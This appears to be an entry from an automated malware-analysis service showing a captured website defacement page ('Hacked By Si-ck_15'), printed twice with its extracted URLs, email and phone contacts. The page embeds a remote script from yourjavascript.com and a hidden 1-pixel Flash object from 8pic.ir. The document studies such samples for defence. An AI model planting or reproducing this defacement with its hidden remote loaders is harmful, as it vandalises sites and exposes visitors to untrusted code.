PHP Malware Analysis

Back to list

Tags

URLs
http://music.agraw.com/Music/Kabyle-Music/Matoub%20Lounes/Hymne.mp3
https://wallpapercave.com/wp/wp2022228.jpg
https://m.facebook.com/Anonymous-team-dz-1416169705351491
http://yourjavascript.com/2146179535/rebel3..js
http://8pic.ir/images/95915944731535871828.swf
http://8pic.ir/images/95915944731535871828.swf
https://pa1.narvii.com/6958/b32afa2ea9c603fc4f73fc443ec0504d42d63d82r1-300-300_hq.gif
https://api.whatsapp.com/send?phone=628994422616
Emails
ammazigh404@gmail.com
Execution
eval

Deobfuscated code

<META NAME="Keywords" CONTENT=Hacked By
Si-ck_15"">

<Title>Hacked By Si-ck_15!</title>

<Style TYPE="text/css">

					gtffrjhfthhhhhhhr

 


A { text-decoration: none; }

</Style>
<center><<font size="20"><font
color="red"</font>*Si-ck_15 <3*</center>
<center> <audio controls autoplay>
  <source src="horse.ogg" type="audio/ogg">
  <source src="http://music.agraw.com/Music/Kabyle-Music/Matoub%20Lounes/Hymne.mp3" type="audio/mpeg">
  Your browser does not support the audio element.
</audio> 
</audio></center>
<center>
<img src="https://wallpapercave.com/wp/wp2022228.jpg"
height="420"
width="550">
<div align="center">
<pre style="font: 30px/20px courier;"><b><script
language="JavaScript1.2">
var message="Your Website was Hacked By Si-ck_15"
var neonbasecolor="gray"
var neontextcolor="blue"
var neontextcolor2="yellow"
var flashspeed=100                                             
var flashingletters=3  
var flashingletters2=1 
var flashpause=0       
 
var n=0
if (document.all||document.getElementById){
document.write('<font color="'+neonbasecolor+'">')
for (m=0;m<message.length;m++)
document.write('<span
id="neonlight'+m+'">'+message.charAt(m)+'</span>')
document.write('</font>')
}
else
document.write(message)
 
function crossref(number){
var crossobj=document.all? eval("document.all.neonlight"+number)
: document.getElementById("neonlight"+number)
return crossobj
}
 
function neon(){
 
//Change all letters to base color
if (n==0){
for (m=0;m<message.length;m++)
crossref(m).style.color=neonbasecolor
}
 
//cycle through and change individual letters to neon color
crossref(n).style.color=neontextcolor
 
if (n>flashingletters-1)
crossref(n-flashingletters).style.color=neontextcolor2
if (n>(flashingletters+flashingletters2)-1)
crossref(n-flashingletters-flashingletters2).style.color=neonbasecolor
 
 
if (n<message.length-1)
n++
else{
n=0
clearInterval(flashing)
setTimeout("beginneon()",flashpause)
return
}
}
 
function beginneon(){
if (document.all||document.getElementById)
flashing=setInterval("neon()",flashspeed)
}
beginneon()
 
</script></b></pre>
</div>
<pre>
<font size="20"><font color="blue">I'm
</font><font color="green">Amazigh
</font><font
color="yellow">Hacker</font><font
size="4"><br>

<font Thnx for my rabbit <3
</font><font size="3"><br>

<font size="6"> WE DO NOT FORGET <a
href="https://m.facebook.com/Anonymous-team-dz-1416169705351491">Facebook</a>

EMAIL:ammazigh404@gmail.com</font><font
size="3"><br>

<font size="6">Thank's to: MATOUB  </font><font
size="3">

<script language="javascript"
type="text/javascript"
 src="http://yourjavascript.com/2146179535/rebel3..js"></script>


<object type="application/x-shockwave-flash"
data="http://8pic.ir/images/95915944731535871828.swf"
width="6" height="1"> 
   <OBJECT type="application/x-shockwave-flash" 

data="http://8pic.ir/images/95915944731535871828.swf"
width="6" height="1"> 
<style> body { background-image:
url("https://pa1.narvii.com/6958/b32afa2ea9c603fc4f73fc443ec0504d42d63d82r1-300-300_hq.gif");
background-size: cover; </style> <center> <link
href="Hacked%20By%205H311_1NJ3C706_files/css.css"
rel="stylesheet" type="text/css"> <link
href="Hacked%20By%205H311_1NJ3C706_files/css_002.css"
rel="stylesheet" type="text/css"> <h1
class="n3t"><font style="text-shadow: 2px 1px 20px
black;" face="Julee" size="9"
color="white"</h1><font style="text-shadow: 2px
1px
20px black;" face="Julee" size="30"
color="white">
<color="white"><rder="2px"><script
type="text/javascript"> TypingText = function(element,
interval, cursor, finishedCallback) { if((typeof document.getElementById
==
"undefined") || (typeof element.innerHTML ==
"undefined")) { this.running = true; return; } this.element =
element; this.finishedCallback = (finishedCallback ? finishedCallback :
function() { return; }); this.interval = (typeof interval ==
"undefined" ? 100 : interval); this.origText =
this.element.innerHTML; this.unparsedOrigText = this.origText; this.cursor
= (cursor ? cursor : ""); this.currentText = "";
this.currentChar = 0; this.element.typingText = this; if(this.element.id
==
"") this.element.id = "typingtext" +
TypingText.currentIndex++; TypingText.all.push(this); this.running =
false;
this.inTag = false; this.tagBuffer = ""; this.inHTMLEntity =
false; this.HTMLEntityBuffer = ""; } TypingText.all = new
Array(); TypingText.currentIndex = 0; TypingText.runAll = function() {
for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
} TypingText.prototype.run = function() { if(this.running) return;
if(typeof this.origText == "undefined") {
setTimeout("document.getElementById('" + this.element.id +
"').typingText.run()", this.interval); return; }
if(this.currentText == "") this.element.innerHTML =
"";
if(this.currentChar < this.origText.length) {
if(this.origText.charAt(this.currentChar) == "<" &&
!this.inTag) { this.tagBuffer = "<"; this.inTag = true;
this.currentChar++; this.run(); return; } else
if(this.origText.charAt(this.currentChar) == ">" &&
this.inTag) { this.tagBuffer += ">"; this.inTag = false;
this.currentText += this.tagBuffer; this.currentChar++; this.run();
return;
} else if(this.inTag) { this.tagBuffer +=
this.origText.charAt(this.currentChar); this.currentChar++; this.run();
return; } else if(this.origText.charAt(this.currentChar) ==
"&" && !this.inHTMLEntity) { this.HTMLEntityBuffer =
"&"; this.inHTMLEntity = true; this.currentChar++;
this.run(); return; } else if(this.origText.charAt(this.currentChar) ==
";" && this.inHTMLEntity) { this.HTMLEntityBuffer +=
";"; this.inHTMLEntity = false; this.currentText +=
this.HTMLEntityBuffer; this.currentChar++; this.run(); return; } else
if(this.inHTMLEntity) { this.HTMLEntityBuffer +=
this.origText.charAt(this.currentChar); this.currentChar++; this.run();
return; } else { this.currentText +=
this.origText.charAt(this.currentChar); } this.element.innerHTML =
this.currentText; this.element.innerHTML += (this.currentChar <
this.origText.length - 1 ? (typeof this.cursor == "function" ?
this.cursor(this.currentText) : this.cursor) : "");
this.currentChar++; setTimeout("document.getElementById('" +
this.element.id + "').typingText.run()", this.interval); } else
{
this.currentText = ""; this.currentChar = 0; this.running =
false; this.finishedCallback(); } } </script>  <center>
<br> <font face="Julee" size="4"
color="dark blue"><a
href="https://api.whatsapp.com/send?phone=628994422616"><font
style="text-shadow: 2px 1px 4px black;" size="4"
color="white"></font></a></font></center><font
face="Julee" size="4" colo


Original code

<META NAME="Keywords" CONTENT=Hacked By
Si-ck_15"">

<Title>Hacked By Si-ck_15!</title>

<Style TYPE="text/css">

					gtffrjhfthhhhhhhr

 


A { text-decoration: none; }

</Style>
<center><<font size="20"><font
color="red"</font>*Si-ck_15 <3*</center>
<center> <audio controls autoplay>
  <source src="horse.ogg" type="audio/ogg">
  <source src="http://music.agraw.com/Music/Kabyle-Music/Matoub%20Lounes/Hymne.mp3" type="audio/mpeg">
  Your browser does not support the audio element.
</audio> 
</audio></center>
<center>
<img src="https://wallpapercave.com/wp/wp2022228.jpg"
height="420"
width="550">
<div align="center">
<pre style="font: 30px/20px courier;"><b><script
language="JavaScript1.2">
var message="Your Website was Hacked By Si-ck_15"
var neonbasecolor="gray"
var neontextcolor="blue"
var neontextcolor2="yellow"
var flashspeed=100                                             
var flashingletters=3  
var flashingletters2=1 
var flashpause=0       
 
var n=0
if (document.all||document.getElementById){
document.write('<font color="'+neonbasecolor+'">')
for (m=0;m<message.length;m++)
document.write('<span
id="neonlight'+m+'">'+message.charAt(m)+'</span>')
document.write('</font>')
}
else
document.write(message)
 
function crossref(number){
var crossobj=document.all? eval("document.all.neonlight"+number)
: document.getElementById("neonlight"+number)
return crossobj
}
 
function neon(){
 
//Change all letters to base color
if (n==0){
for (m=0;m<message.length;m++)
crossref(m).style.color=neonbasecolor
}
 
//cycle through and change individual letters to neon color
crossref(n).style.color=neontextcolor
 
if (n>flashingletters-1)
crossref(n-flashingletters).style.color=neontextcolor2
if (n>(flashingletters+flashingletters2)-1)
crossref(n-flashingletters-flashingletters2).style.color=neonbasecolor
 
 
if (n<message.length-1)
n++
else{
n=0
clearInterval(flashing)
setTimeout("beginneon()",flashpause)
return
}
}
 
function beginneon(){
if (document.all||document.getElementById)
flashing=setInterval("neon()",flashspeed)
}
beginneon()
 
</script></b></pre>
</div>
<pre>
<font size="20"><font color="blue">I'm
</font><font color="green">Amazigh
</font><font
color="yellow">Hacker</font><font
size="4"><br>

<font Thnx for my rabbit <3
</font><font size="3"><br>

<font size="6"> WE DO NOT FORGET <a
href="https://m.facebook.com/Anonymous-team-dz-1416169705351491">Facebook</a>

EMAIL:ammazigh404@gmail.com</font><font
size="3"><br>

<font size="6">Thank's to: MATOUB  </font><font
size="3">

<script language="javascript"
type="text/javascript"
 src="http://yourjavascript.com/2146179535/rebel3..js"></script>


<object type="application/x-shockwave-flash"
data="http://8pic.ir/images/95915944731535871828.swf"
width="6" height="1"> 
   <OBJECT type="application/x-shockwave-flash" 

data="http://8pic.ir/images/95915944731535871828.swf"
width="6" height="1"> 
<style> body { background-image:
url("https://pa1.narvii.com/6958/b32afa2ea9c603fc4f73fc443ec0504d42d63d82r1-300-300_hq.gif");
background-size: cover; </style> <center> <link
href="Hacked%20By%205H311_1NJ3C706_files/css.css"
rel="stylesheet" type="text/css"> <link
href="Hacked%20By%205H311_1NJ3C706_files/css_002.css"
rel="stylesheet" type="text/css"> <h1
class="n3t"><font style="text-shadow: 2px 1px 20px
black;" face="Julee" size="9"
color="white"</h1><font style="text-shadow: 2px
1px
20px black;" face="Julee" size="30"
color="white">
<color="white"><rder="2px"><script
type="text/javascript"> TypingText = function(element,
interval, cursor, finishedCallback) { if((typeof document.getElementById
==
"undefined") || (typeof element.innerHTML ==
"undefined")) { this.running = true; return; } this.element =
element; this.finishedCallback = (finishedCallback ? finishedCallback :
function() { return; }); this.interval = (typeof interval ==
"undefined" ? 100 : interval); this.origText =
this.element.innerHTML; this.unparsedOrigText = this.origText; this.cursor
= (cursor ? cursor : ""); this.currentText = "";
this.currentChar = 0; this.element.typingText = this; if(this.element.id
==
"") this.element.id = "typingtext" +
TypingText.currentIndex++; TypingText.all.push(this); this.running =
false;
this.inTag = false; this.tagBuffer = ""; this.inHTMLEntity =
false; this.HTMLEntityBuffer = ""; } TypingText.all = new
Array(); TypingText.currentIndex = 0; TypingText.runAll = function() {
for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
} TypingText.prototype.run = function() { if(this.running) return;
if(typeof this.origText == "undefined") {
setTimeout("document.getElementById('" + this.element.id +
"').typingText.run()", this.interval); return; }
if(this.currentText == "") this.element.innerHTML =
"";
if(this.currentChar < this.origText.length) {
if(this.origText.charAt(this.currentChar) == "<" &&
!this.inTag) { this.tagBuffer = "<"; this.inTag = true;
this.currentChar++; this.run(); return; } else
if(this.origText.charAt(this.currentChar) == ">" &&
this.inTag) { this.tagBuffer += ">"; this.inTag = false;
this.currentText += this.tagBuffer; this.currentChar++; this.run();
return;
} else if(this.inTag) { this.tagBuffer +=
this.origText.charAt(this.currentChar); this.currentChar++; this.run();
return; } else if(this.origText.charAt(this.currentChar) ==
"&" && !this.inHTMLEntity) { this.HTMLEntityBuffer =
"&"; this.inHTMLEntity = true; this.currentChar++;
this.run(); return; } else if(this.origText.charAt(this.currentChar) ==
";" && this.inHTMLEntity) { this.HTMLEntityBuffer +=
";"; this.inHTMLEntity = false; this.currentText +=
this.HTMLEntityBuffer; this.currentChar++; this.run(); return; } else
if(this.inHTMLEntity) { this.HTMLEntityBuffer +=
this.origText.charAt(this.currentChar); this.currentChar++; this.run();
return; } else { this.currentText +=
this.origText.charAt(this.currentChar); } this.element.innerHTML =
this.currentText; this.element.innerHTML += (this.currentChar <
this.origText.length - 1 ? (typeof this.cursor == "function" ?
this.cursor(this.currentText) : this.cursor) : "");
this.currentChar++; setTimeout("document.getElementById('" +
this.element.id + "').typingText.run()", this.interval); } else
{
this.currentText = ""; this.currentChar = 0; this.running =
false; this.finishedCallback(); } } </script>  <center>
<br> <font face="Julee" size="4"
color="dark blue"><a
href="https://api.whatsapp.com/send?phone=628994422616"><font
style="text-shadow: 2px 1px 4px black;" size="4"
color="white"></font></a></font></center><font
face="Julee" size="4" colo